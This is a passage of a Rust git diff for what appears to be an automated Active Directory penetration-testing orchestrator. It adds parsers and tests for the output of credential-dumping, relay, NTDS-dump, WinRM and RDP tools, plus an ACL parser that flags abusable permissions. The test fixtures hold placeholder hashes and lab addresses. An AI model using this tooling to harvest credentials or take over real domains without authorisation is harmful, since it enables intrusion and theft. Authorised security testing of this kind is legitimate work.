assert_eq!(creds[0]["password"], "Password123"); } + + #[test] + fn lsassy_handles_nxc_prefix_with_nt_hash_marker() { + // Real lsassy-via-nxc line format: a transport prefix, then the + // credential block. Domain prefix appears mid-line, not at the start. + let output = "\ +SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\\Administrator [NT] 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1, "should pick up the [NT] hash"); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["username"], "Administrator"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_strips_real_ansi_escape_sequences() { + // Real ANSI from the wire — the parser must not see them. + let output = + "\x1b[1;33mCONTOSO\\alice\x1b[0m \x1b[1;32m[NT]\x1b[0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + } + + #[test] + fn lsassy_strips_bare_text_ansi_leftovers() { + // When ESC bytes are stripped during transport, the visible style + // codes (`[1;33m`, `[0m`) survive as bare text. Strip them too. + let output = "[1;33mCONTOSO\\alice[0m [1;32m[NT][0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_rejects_garbage_domain_from_naive_first_backslash() { + // The pre-fix bug: nxc prefix has no backslash, but `contoso.local\Administrator:HASH` + // sits in the line. Naive first-backslash parsing wrongly stuffed the + // entire prefix ("SMB ... DC01 [+] contoso.local") into `domain`. + // The fix must extract a clean domain ("contoso.local") instead. + let output = "\ +SMB 192.168.58.10 445 DC01 [+] contoso.local\\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[0]["username"], "Administrator"); + } + + #[test] + fn lsassy_rejects_path_like_backslashes() { + // Backslashes in Windows paths shouldn't be treated as DOMAIN\user. + // The token after `\` here is empty / has no secret following. + let output = "[*] Loading file C:\\Windows\\Temp\\dump.dmp"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert!(hashes.is_empty()); + assert!(creds.is_empty()); + } + + #[test] + fn lsassy_rejects_pwd_tgt_field_markers_as_passwords() { + // lsassy emits `[PWD]` / `[TGT]` as *labels* when it found a credential + // of that type but redacted/elided the value. Storing the marker as a + // password poisoned operation state and made tools receive literal + // `[PWD]`/`[TGT]` strings as auth values, breaking lateral movement. + let output = "\ +CHILD\\DC01$ [PWD] +CHILD\\eve [TGT] +CHILD\\eve:[PWD] +CONTOSO\\real_user RealPassword123"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert!(hashes.is_empty()); + assert_eq!( + creds.len(), + 1, + "only the real password should be stored, got: {creds:?}" + ); + assert_eq!(creds[0]["username"], "real_user"); + assert_eq!(creds[0]["password"], "RealPassword123"); + } + + #[test] + fn lsassy_does_not_swallow_sha1_decoration_into_password() { + // Whitespace-separated form with `[SHA1] …` trailing decoration. + // The parser should pick the NT hash, not concatenate the rest. + let output = "CONTOSO\\bob 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } } diff --git a/ares-tools/src/parsers/mod.rs b/ares-tools/src/parsers/mod.rs index 291ec55a..9d946445 100644 --- a/ares-tools/src/parsers/mod.rs +++ b/ares-tools/src/parsers/mod.rs @@ -10,6 +10,7 @@ mod credential_tools; mod delegation; mod mssql; mod nmap; +mod ntsd; mod secrets; mod smb; mod spider; @@ -27,6 +28,7 @@ pub use credential_tools::{ pub use delegation::{extract_delegation_account, parse_delegation}; pub use mssql::{parse_mssql_impersonation, parse_mssql_linked_servers}; pub use nmap::{flush_nmap_host, parse_nmap_output}; +pub use ntsd::parse_acl_enumeration; pub use secrets::{parse_asrep_roast, parse_kerberoast, parse_secretsdump}; pub use smb::{parse_netexec_smb, parse_smb_signing}; pub use spider::parse_spider_credentials; @@ -88,7 +90,11 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value "run_bloodhound" => { // BloodHound collection doesn't produce immediate discoveries } - "secretsdump" | "secretsdump_kerberos" => { + "secretsdump" | "secretsdump_kerberos" | "forge_inter_realm_and_dump" => { + // forge_inter_realm_and_dump runs ticketer + secretsdump in one + // call. The orchestrator passes `target_domain` so secretsdump + // hashes get attributed to the dumped (target/parent) realm, + // not the forging (source/child) realm. let (hashes, creds) = parse_secretsdump(output, params); if !hashes.is_empty() { discoveries["hashes"] = Value::Array(hashes); @@ -97,6 +103,32 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "raise_child" => { + // raiseChild.py performs the parent-domain NTDS dump in standard + // secretsdump format (lines like "domain.local/user:RID:LM:NT:::" + // or "DOMAIN\\user:RID:..."). Derive parent FQDN from child_domain + // and pass as target_domain so bare-username lines and NetBIOS + // prefixes get attributed to the parent forest root. + let child_domain = params + .get("child_domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let parent_domain = child_domain + .split_once('.') + .map(|(_, rest)| rest) + .unwrap_or(child_domain); + let mut params_with_target = params.clone(); + if let Some(obj) = params_with_target.as_object_mut() { + obj.insert("target_domain".into(), json!(parent_domain)); + } + let (hashes, creds) = parse_secretsdump(output, ¶ms_with_target); + if !hashes.is_empty() { + discoveries["hashes"] = Value::Array(hashes); + } + if !creds.is_empty() { + discoveries["credentials"] = Value::Array(creds); + } + } "kerberoast" => { let hashes = parse_kerberoast(output, params); if !hashes.is_empty() { @@ -177,7 +209,7 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } - "password_spray" => { + "password_spray" | "smb_login_check" => { let creds = parse_spray_success(output, params); if !creds.is_empty() { discoveries["credentials"] = Value::Array(creds); @@ -244,6 +276,139 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "ldap_acl_enumeration" => { + let vulns = parse_acl_enumeration(output, params); + if !vulns.is_empty() { + discoveries["vulnerabilities"] = Value::Array(vulns); + } + } + "password_policy" => { + // Password policy is informational metadata, not an exploitable vuln — + // surfacing it as `vulnerabilities[]` makes the orchestrator route it to + // the exploit agent, which has no spray tool and dead-ends every time. + // The lockout/min-length details inform spray cadence elsewhere; we + // expose them under a dedicated key so consumers can read without the + // exploit-routing side effect. + let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if !output.is_empty() && !domain.is_empty() { + let lockout_threshold = output + .lines() + .find(|l| l.to_lowercase().contains("account lockout threshold")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let min_length = output + .lines() + .find(|l| l.to_lowercase().contains("minimum password length")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let mut details = serde_json::Map::new(); + details.insert("domain".into(), json!(domain)); + details.insert("target_ip".into(), json!(target)); + if let Some(ref lt) = lockout_threshold { + details.insert("lockout_threshold".into(), json!(lt)); + } + if let Some(ref ml) = min_length { + details.insert("min_password_length".into(), json!(ml)); + } + discoveries["password_policies"] = json!([details]); + } + } + "evil_winrm" => { + // Detect successful WinRM connection from evil-winrm output. + // A successful connection typically shows "Evil-WinRM shell" or + // output from executed commands (e.g., "whoami" returning a username). + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if output.contains("Evil-WinRM") + || output.contains("\\") // whoami output like DOMAIN\user + || output.contains("PS >") + { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("winrm_access_{}", target.replace('.', "_")), + "vuln_type": "winrm_access", + "target": target, + "details": { + "description": format!("WinRM access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } + "relay_and_coerce" => { + // Composite ESC8 tool prints `PFX_FILE=...` and `RELAYED_USER=...` + // markers when the cert is captured. Convert to a + // `certificate_obtained` vuln so `auto_certipy_auth` picks it up. + let pfx_path = output + .lines() + .find_map(|l| l.trim().strip_prefix("PFX_FILE=")) + .map(str::trim); + let relayed_user = output + .lines() + .find_map(|l| l.trim().strip_prefix("RELAYED_USER=")) + .map(str::trim); + + if let Some(pfx) = pfx_path { + // Cert is for the target DC's realm (the relayed identity's + // home), not the coercion credential's domain. Caller passes + // `target_domain` for cross-forest cases; fall back to + // `coerce_domain` for same-forest. + let target_domain = params + .get("target_domain") + .and_then(|v| v.as_str()) + .or_else(|| params.get("coerce_domain").and_then(|v| v.as_str())) + .unwrap_or(""); + let coerce_target = params + .get("coerce_target") + .and_then(|v| v.as_str()) + .or_else(|| params.get("target_dc").and_then(|v| v.as_str())) + .unwrap_or(""); + let user = relayed_user.unwrap_or(""); + let mut details = serde_json::Map::new(); + details.insert("pfx_path".into(), json!(pfx)); + if !target_domain.is_empty() { + details.insert("domain".into(), json!(target_domain)); + } + if !user.is_empty() { + details.insert("target_user".into(), json!(user)); + details.insert("account_name".into(), json!(user)); + } + if !coerce_target.is_empty() { + details.insert("target_ip".into(), json!(coerce_target)); + } + details.insert("source".into(), json!("relay_and_coerce")); + details.insert( + "description".into(), + json!(format!( + "ESC8 relay captured certificate for {user} in {target_domain}" + )), + ); + let user_safe = user.replace(['$', '.'], "_"); + let domain_safe = target_domain.replace('.', "_"); + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("certificate_obtained_{user_safe}_{domain_safe}"), + "vuln_type": "certificate_obtained", + "target": coerce_target, + "details": details, + }]); + } + } + "xfreerdp" => { + // Detect successful RDP authentication from xfreerdp output. + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + // xfreerdp success: shows "Authentication only" or specific success patterns + let success = output.contains("Authentication only, exit status 0") + || (output.contains("connected to") && !output.contains("ERRCONNECT")) + || output.contains("FREERDP_CB_SESSION_STARTED"); + if success { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("rdp_access_{}", target.replace('.', "_")), + "vuln_type": "rdp_access", + "target": target, + "details": { + "description": format!("RDP access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } _ => {} } @@ -626,6 +791,28 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert!(!disc["hashes"].as_array().unwrap().is_empty()); } + #[test] + fn parse_tool_output_raise_child_attributes_to_parent() { + // raise_child dumps the parent NTDS in slash-separated FQDN format. + // Parser must derive parent_domain from child_domain and attribute hashes there. + let output = "\ +[*] Forest is contoso.local +contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: +contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::"; + let params = json!({ + "child_domain": "child.contoso.local", + "username": "testuser", + "password": "REDACTED", + }); + let disc = parse_tool_output("raise_child", output, ¶ms); + let hashes = disc["hashes"].as_array().expect("hashes array"); + assert_eq!(hashes.len(), 2); + assert_eq!(hashes[0]["username"], "krbtgt"); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[1]["username"], "Administrator"); + assert_eq!(hashes[1]["domain"], "contoso.local"); + } + #[test] fn parse_tool_output_kerberoast() { let output = "$krb5tgs$23$*svc_sql$CONTOSO$contoso.local/svc_sql*$abc"; @@ -711,6 +898,75 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert_eq!(td.len(), 1, "Duplicate trusted domains should be deduped"); } + #[test] + fn parse_tool_output_relay_and_coerce_emits_cert_vuln() { + let output = "RELAY_PID=1234\n\ + === Coercing via MS-DFSNM ===\n\ + CERT_CAPTURED_VIA=MS-DFSNM\n\ + PFX_FILE=/tmp/ares_relay_999/DC01$.pfx\n\ + RELAYED_USER=DC01$\n\ + === RELAY LOG ===\n\ + [*] Servers started\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "target_domain": "contoso.local", + "coerce_domain": "child.contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().expect("vulns array"); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "certificate_obtained"); + assert_eq!( + vulns[0]["details"]["pfx_path"], + "/tmp/ares_relay_999/DC01$.pfx" + ); + assert_eq!(vulns[0]["details"]["domain"], "contoso.local"); + assert_eq!(vulns[0]["details"]["target_user"], "DC01$"); + assert_eq!(vulns[0]["target"], "192.168.58.20"); + } + + #[test] + fn parse_tool_output_relay_and_coerce_no_capture_no_vuln() { + let output = "RELAY_PID=1234\n\ + === Coercing via MS-DFSNM ===\n\ + === Coercing via MS-EFSR ===\n\ + === Coercing via MS-RPRN ===\n\ + === RELAY LOG ===\n\ + [*] Servers started\n"; + let params = json!({"ca_host": "192.168.58.10", "coerce_target": "192.168.58.20"}); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + assert!(disc.get("vulnerabilities").is_none()); + } + + #[test] + fn parse_tool_output_relay_and_coerce_falls_back_to_coerce_domain() { + // Same-forest case: only coerce_domain present. + let output = "PFX_FILE=/tmp/ares_relay_1/dc01$.pfx\nRELAYED_USER=dc01$\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "coerce_domain": "contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["details"]["domain"], "contoso.local"); + } + + #[test] + fn parse_tool_output_relay_and_coerce_legacy_target_dc_alias() { + // Backwards-compat: orchestrator state may still emit `target_dc`. + let output = "PFX_FILE=/tmp/ares_relay_2/dc01$.pfx\nRELAYED_USER=dc01$\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "target_dc": "192.168.58.20", + "coerce_domain": "contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["target"], "192.168.58.20"); + } + #[test] fn parse_tool_output_smb_signing_check() { let output = "SMB 192.168.58.10 445 DC01 signing:True"; diff --git a/ares-tools/src/parsers/ntsd.rs b/ares-tools/src/parsers/ntsd.rs new file mode 100644 index 00000000..8f5d527b --- /dev/null +++ b/ares-tools/src/parsers/ntsd.rs @@ -0,0 +1,759 @@ +//! nTSecurityDescriptor binary parser. +//! +//! Parses Windows SECURITY_DESCRIPTOR binary data (self-relative format) from +//! LDAP nTSecurityDescriptor attribute values to extract DACL ACE entries. +//! Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, etc.) +//! and returns them as structured vulnerability discoveries. + +use serde_json::{json, Value}; + +// ── Well-known SID prefixes ──────────────────────────────────────────────── + +/// Map well-known SIDs to friendly names. +fn well_known_sid(sid: &str) -> Option<&'static str> { + match sid { + "S-1-0-0" => Some("Nobody"), + "S-1-1-0" => Some("Everyone"), + "S-1-5-7" => Some("ANONYMOUS LOGON"), + "S-1-5-10" => Some("SELF"), + "S-1-5-11" => Some("Authenticated Users"), + "S-1-5-18" => Some("SYSTEM"), + "S-1-5-32-544" => Some("BUILTIN\\Administrators"), + "S-1-5-32-545" => Some("BUILTIN\\Users"), + _ => None, + } +} + +// ── Access mask flags ────────────────────────────────────────────────────── + +const GENERIC_ALL: u32 = 0x10000000; +const GENERIC_WRITE: u32 = 0x40000000; +const ADS_RIGHT_DS_CONTROL_ACCESS: u32 = 0x00000100; +const ADS_RIGHT_DS_WRITE_PROP: u32 = 0x00000020; +const ADS_RIGHT_DS_SELF: u32 = 0x00000008; +const WRITE_DACL: u32 = 0x00040000; +const WRITE_OWNER: u32 = 0x00080000; +const FULL_CONTROL: u32 = 0x000F01FF; + +// ── Object type GUIDs for extended rights ────────────────────────────────── + +/// User-Force-Change-Password (Reset Password extended right) +const GUID_FORCE_CHANGE_PASSWORD: &str = "00299570-246d-11d0-a768-00aa006e0529"; +/// Self-Membership (validated write to group member attribute) +const GUID_SELF_MEMBERSHIP: &str = "bf9679c0-0de6-11d0-a285-00aa003049e2"; +/// Write-Member (write to member attribute on group) +const GUID_WRITE_MEMBER: &str = "bf9679a8-0de6-11d0-a285-00aa003049e2"; +/// All Extended Rights +#[allow(dead_code)] +const GUID_ALL_EXTENDED_RIGHTS: &str = "00000000-0000-0000-0000-000000000000"; + +// ── Binary parsing helpers ───────────────────────────────────────────────── + +fn read_u8(data: &[u8], offset: usize) -> Option { + data.get(offset).copied() +} + +fn read_u16_le(data: &[u8], offset: usize) -> Option { + if offset + 2 > data.len() { + return None; + } + Some(u16::from_le_bytes([data[offset], data[offset + 1]])) +} + +fn read_u32_le(data: &[u8], offset: usize) -> Option { + if offset + 4 > data.len() { + return None; + } + Some(u32::from_le_bytes([ + data[offset], + data[offset + 1], + data[offset + 2], + data[offset + 3], + ])) +} + +/// Parse a SID from binary data at the given offset. +/// Returns (sid_string, bytes_consumed). +fn parse_sid(data: &[u8], offset: usize) -> Option<(String, usize)> { + let revision = read_u8(data, offset)?; + let sub_authority_count = read_u8(data, offset + 1)? as usize; + + if offset + 8 + sub_authority_count * 4 > data.len() { + return None; + } + + // IdentifierAuthority is 6 bytes big-endian + let auth_bytes = &data[offset + 2..offset + 8]; + let authority = if auth_bytes[0] == 0 && auth_bytes[1] == 0 { + // Fits in a u32 — use the last 4 bytes + u32::from_be_bytes([auth_bytes[2], auth_bytes[3], auth_bytes[4], auth_bytes[5]]) as u64 + } else { + // Full 48-bit authority + ((auth_bytes[0] as u64) << 40) + | ((auth_bytes[1] as u64) << 32) + | ((auth_bytes[2] as u64) << 24) + | ((auth_bytes[3] as u64) << 16) + | ((auth_bytes[4] as u64) << 8) + | (auth_bytes[5] as u64) + }; + + let mut sid = format!("S-{revision}-{authority}"); + for i in 0..sub_authority_count { + let sub_auth = read_u32_le(data, offset + 8 + i * 4)?; + sid.push_str(&format!("-{sub_auth}")); + } + + let consumed = 8 + sub_authority_count * 4; + Some((sid, consumed)) +} + +/// Parse a GUID from 16 bytes in mixed-endian format (as stored in AD). +fn parse_guid(data: &[u8], offset: usize) -> Option { + if offset + 16 > data.len() { + return None; + } + let d1 = read_u32_le(data, offset)?; + let d2 = read_u16_le(data, offset + 4)?; + let d3 = read_u16_le(data, offset + 6)?; + let d4 = &data[offset + 8..offset + 16]; + Some(format!( + "{:08x}-{:04x}-{:04x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}", + d1, d2, d3, d4[0], d4[1], d4[2], d4[3], d4[4], d4[5], d4[6], d4[7] + )) +} + +// ── ACE types ────────────────────────────────────────────────────────────── + +const ACCESS_ALLOWED_ACE_TYPE: u8 = 0x00; +const ACCESS_ALLOWED_OBJECT_ACE_TYPE: u8 = 0x05; + +/// A parsed ACE with the information we care about. +#[derive(Debug)] +struct ParsedAce { + trustee_sid: String, + access_mask: u32, + object_type_guid: Option, +} + +/// Classify an ACE into a vulnerability type name, if it's dangerous. +fn classify_ace(ace: &ParsedAce) -> Vec<&'static str> { + let mask = ace.access_mask; + let mut types = Vec::new(); + + // GenericAll — full control + if mask & GENERIC_ALL != 0 || mask == FULL_CONTROL { + types.push("genericall"); + return types; // GenericAll subsumes everything + } + + // GenericWrite + if mask & GENERIC_WRITE != 0 { + types.push("genericwrite"); + } + + // WriteDacl + if mask & WRITE_DACL != 0 { + types.push("writedacl"); + } + + // WriteOwner + if mask & WRITE_OWNER != 0 { + types.push("writeowner"); + } + + // Object-type specific rights + if let Some(ref guid) = ace.object_type_guid { + let guid_lower = guid.to_lowercase(); + if guid_lower == GUID_FORCE_CHANGE_PASSWORD && (mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0) { + types.push("forcechangepassword"); + } + if guid_lower == GUID_SELF_MEMBERSHIP && (mask & ADS_RIGHT_DS_SELF != 0) { + types.push("self_membership"); + } + if guid_lower == GUID_WRITE_MEMBER && (mask & ADS_RIGHT_DS_WRITE_PROP != 0) { + types.push("write_membership"); + } + } + + // AllExtendedRights (no object type restriction or null GUID) + if mask & ADS_RIGHT_DS_CONTROL_ACCESS != 0 && ace.object_type_guid.is_none() { + types.push("allextendedrights"); + } + + // WriteProperty with no specific object type + if mask & ADS_RIGHT_DS_WRITE_PROP != 0 { + if let Some(ref guid) = ace.object_type_guid { + if guid.to_lowercase() != GUID_WRITE_MEMBER { + types.push("writeproperty"); + } + } else { + types.push("writeproperty"); + } + } + + types +} + +/// Parse a single ACE from binary data. +/// Returns (ParsedAce, total_ace_size). +fn parse_ace(data: &[u8], offset: usize) -> Option<(ParsedAce, usize)> { + let ace_type = read_u8(data, offset)?; + let _ace_flags = read_u8(data, offset + 1)?; + let ace_size = read_u16_le(data, offset + 2)? as usize; + + if offset + ace_size > data.len() || ace_size < 8 { + return None; + } + + match ace_type { + ACCESS_ALLOWED_ACE_TYPE => { + let access_mask = read_u32_le(data, offset + 4)?; + let (sid, _) = parse_sid(data, offset + 8)?; + Some(( + ParsedAce { + trustee_sid: sid, + access_mask, + object_type_guid: None, + }, + ace_size, + )) + } + ACCESS_ALLOWED_OBJECT_ACE_TYPE => { + let access_mask = read_u32_le(data, offset + 4)?; + let flags = read_u32_le(data, offset + 8)?; + + let mut guid_offset = offset + 12; + let object_type_guid = if flags & 0x01 != 0 { + let guid = parse_guid(data, guid_offset)?; + guid_offset += 16; + Some(guid) + } else { + None + }; + + // Skip InheritedObjectType if present + if flags & 0x02 != 0 { + guid_offset += 16; + } + + let (sid, _) = parse_sid(data, guid_offset)?; + Some(( + ParsedAce { + trustee_sid: sid, + access_mask, + object_type_guid, + }, + ace_size, + )) + } + _ => { + // Skip unknown ACE types + Some(( + ParsedAce { + trustee_sid: String::new(), + access_mask: 0, + object_type_guid: None, + }, + ace_size, + )) + } + } +} + +/// Parse a SECURITY_DESCRIPTOR in self-relative format and extract DACL ACEs. +/// +/// Returns a list of (trustee_sid, vuln_type) pairs for dangerous ACEs. +pub fn parse_security_descriptor(data: &[u8]) -> Vec<(String, String)> { + if data.len() < 20 { + return Vec::new(); + } + + let _revision = read_u8(data, 0); + let _sbz1 = read_u8(data, 1); + let control = read_u16_le(data, 2).unwrap_or(0); + + // Check SE_DACL_PRESENT (bit 2) + if control & 0x0004 == 0 { + return Vec::new(); + } + + // SE_SELF_RELATIVE check (bit 15) — we only handle self-relative + if control & 0x8000 == 0 { + return Vec::new(); + } + + let dacl_offset = read_u32_le(data, 16).unwrap_or(0) as usize; + if dacl_offset == 0 || dacl_offset >= data.len() { + return Vec::new(); + } + + // DACL header: Revision(1) + Sbz1(1) + AclSize(2) + AceCount(2) + Sbz2(2) + if dacl_offset + 8 > data.len() { + return Vec::new(); + } + + let ace_count = read_u16_le(data, dacl_offset + 4).unwrap_or(0) as usize; + + let mut results = Vec::new(); + let mut ace_offset = dacl_offset + 8; // skip ACL header + + for _ in 0..ace_count { + if ace_offset >= data.len() { + break; + } + match parse_ace(data, ace_offset) { + Some((ace, size)) => { + if !ace.trustee_sid.is_empty() { + for vuln_type in classify_ace(&ace) { + results.push((ace.trustee_sid.clone(), vuln_type.to_string())); + } + } + ace_offset += size; + } + None => break, + } + } + + results +} + +/// Parse ldapsearch output containing base64-encoded nTSecurityDescriptor values. +/// +/// Expects output in ldapsearch format: +/// ```text +/// dn: CN=someuser,DC=contoso,DC=local +/// sAMAccountName: someuser +/// nTSecurityDescriptor:: +/// ``` +/// +/// Returns vulnerability discoveries as JSON values. +pub fn parse_acl_enumeration(output: &str, params: &Value) -> Vec { + use std::collections::HashMap; + + let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let target_ip = params + .get("target") + .or_else(|| params.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + + // Build a SID → sAMAccountName map from the output itself + let mut sid_to_name: HashMap = HashMap::new(); + let mut vulns = Vec::new(); + + // First pass: collect all objects with their sAMAccountName and objectSid + struct LdapObject { + sam_account_name: String, + object_class: String, // user, group, computer + ntsd_base64: String, + object_sid: String, + } + + let mut objects: Vec = Vec::new(); + let mut current = LdapObject { + sam_account_name: String::new(), + object_class: String::new(), + ntsd_base64: String::new(), + object_sid: String::new(), + }; + let mut in_ntsd = false; + let mut ntsd_buf = String::new(); + + for line in output.lines() { + let line = line.trim_end(); + + if line.starts_with("dn: ") || (line.is_empty() && !current.sam_account_name.is_empty()) { + // Flush current + if in_ntsd { + current.ntsd_base64 = ntsd_buf.clone(); + in_ntsd = false; + ntsd_buf.clear(); + } + if !current.sam_account_name.is_empty() { + objects.push(current); + } + current = LdapObject { + sam_account_name: String::new(), + object_class: String::new(), + ntsd_base64: String::new(), + object_sid: String::new(), + }; + continue; + } + + // Handle base64 continuation lines (start with space) + if in_ntsd { + if line.starts_with(' ') { + ntsd_buf.push_str(line.trim()); + continue; + } else { + current.ntsd_base64 = ntsd_buf.clone(); + in_ntsd = false; + ntsd_buf.clear(); + } + } + + if let Some(val) = line.strip_prefix("sAMAccountName: ") { + current.sam_account_name = val.trim().to_string(); + } else if let Some(val) = line.strip_prefix("objectClass: ") { + let val = val.trim().to_lowercase(); + // Keep the most specific class + if val == "user" || val == "computer" || val == "group" { + current.object_class = val; + } + } else if let Some(val) = line.strip_prefix("objectSid:: ") { + // Base64-encoded SID + if let Ok(bytes) = base64_decode(val.trim()) { + if let Some((sid, _)) = parse_sid(&bytes, 0) { + current.object_sid = sid; + } + } + } else if let Some(val) = line.strip_prefix("objectSid: ") { + // String SID + current.object_sid = val.trim().to_string(); + } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor:: ") { + ntsd_buf = val.trim().to_string(); + in_ntsd = true; + } else if let Some(val) = line.strip_prefix("nTSecurityDescriptor: ") { + // Non-base64 (shouldn't happen but handle it) + current.ntsd_base64 = val.trim().to_string(); + } + } + // Flush last object + if in_ntsd { + current.ntsd_base64 = ntsd_buf; + } + if !current.sam_account_name.is_empty() { + objects.push(current); + } + + // Build SID map + for obj in &objects { + if !obj.object_sid.is_empty() && !obj.sam_account_name.is_empty() { + sid_to_name.insert(obj.object_sid.clone(), obj.sam_account_name.clone()); + } + } + + // Second pass: parse each nTSecurityDescriptor and extract dangerous ACEs + for obj in &objects { + if obj.ntsd_base64.is_empty() { + continue; + } + + let sd_bytes = match base64_decode(&obj.ntsd_base64) { + Ok(b) => b, + Err(_) => continue, + }; + + let aces = parse_security_descriptor(&sd_bytes); + for (trustee_sid, vuln_type) in &aces { + // Resolve trustee SID to name + let source_name = sid_to_name + .get(trustee_sid) + .map(|s| s.as_str()) + .or_else(|| well_known_sid(trustee_sid)) + .unwrap_or(trustee_sid); + + // Skip well-known system SIDs and high-privilege groups that aren't + // actionable (you'd already need DA to abuse them). + let source_lower = source_name.to_lowercase(); + if matches!( + source_name, + "SYSTEM" + | "BUILTIN\\Administrators" + | "BUILTIN\\Users" + | "SELF" + | "Nobody" + | "ANONYMOUS LOGON" + ) || source_lower == "administrators" + || source_lower == "domain admins" + || source_lower == "enterprise admins" + || source_lower == "key admins" + || source_lower == "enterprise key admins" + || source_lower == "account operators" + || source_lower == "domain controllers" + || source_lower == "enterprise domain controllers" + { + continue; + } + + // Skip if source == target (self-permissions) + if source_name.eq_ignore_ascii_case(&obj.sam_account_name) { + continue; + } + + let target_type = match obj.object_class.as_str() { + "user" => "User", + "group" => "Group", + "computer" => "Computer", + _ => "Unknown", + }; + + let vuln_id = format!( + "acl_{}_{}_{}", + vuln_type, + source_name.to_lowercase().replace(' ', "_"), + obj.sam_account_name.to_lowercase().replace('$', "") + ); + + vulns.push(json!({ + "vuln_id": vuln_id, + "vuln_type": vuln_type, + "source": source_name, + "target": obj.sam_account_name, + "target_type": target_type, + "target_ip": target_ip, + "domain": domain, + "source_domain": domain, + "details": { + "trustee_sid": trustee_sid, + "source": source_name, + "target": obj.sam_account_name, + "target_type": target_type, + "domain": domain, + "source_domain": domain, + "description": format!( + "{} has {} on {} ({})", + source_name, vuln_type, obj.sam_account_name, target_type + ), + }, + })); + } + } + + vulns +} + +/// Simple base64 decoder (no external dependency). +fn base64_decode(input: &str) -> Result, &'static str> { + // Strip whitespace + let clean: String = input.chars().filter(|c| !c.is_whitespace()).collect(); + if clean.is_empty() { + return Ok(Vec::new()); + } + + let mut output = Vec::with_capacity(clean.len() * 3 / 4); + let mut buf: u32 = 0; + let mut bits: u32 = 0; + + for ch in clean.chars() { + let val = match ch { + 'A'..='Z' => ch as u32 - 'A' as u32, + 'a'..='z' => ch as u32 - 'a' as u32 + 26, + '0'..='9' => ch as u32 - '0' as u32 + 52, + '+' => 62, + '/' => 63, + '=' => continue, // padding + _ => return Err("invalid base64 character"), + 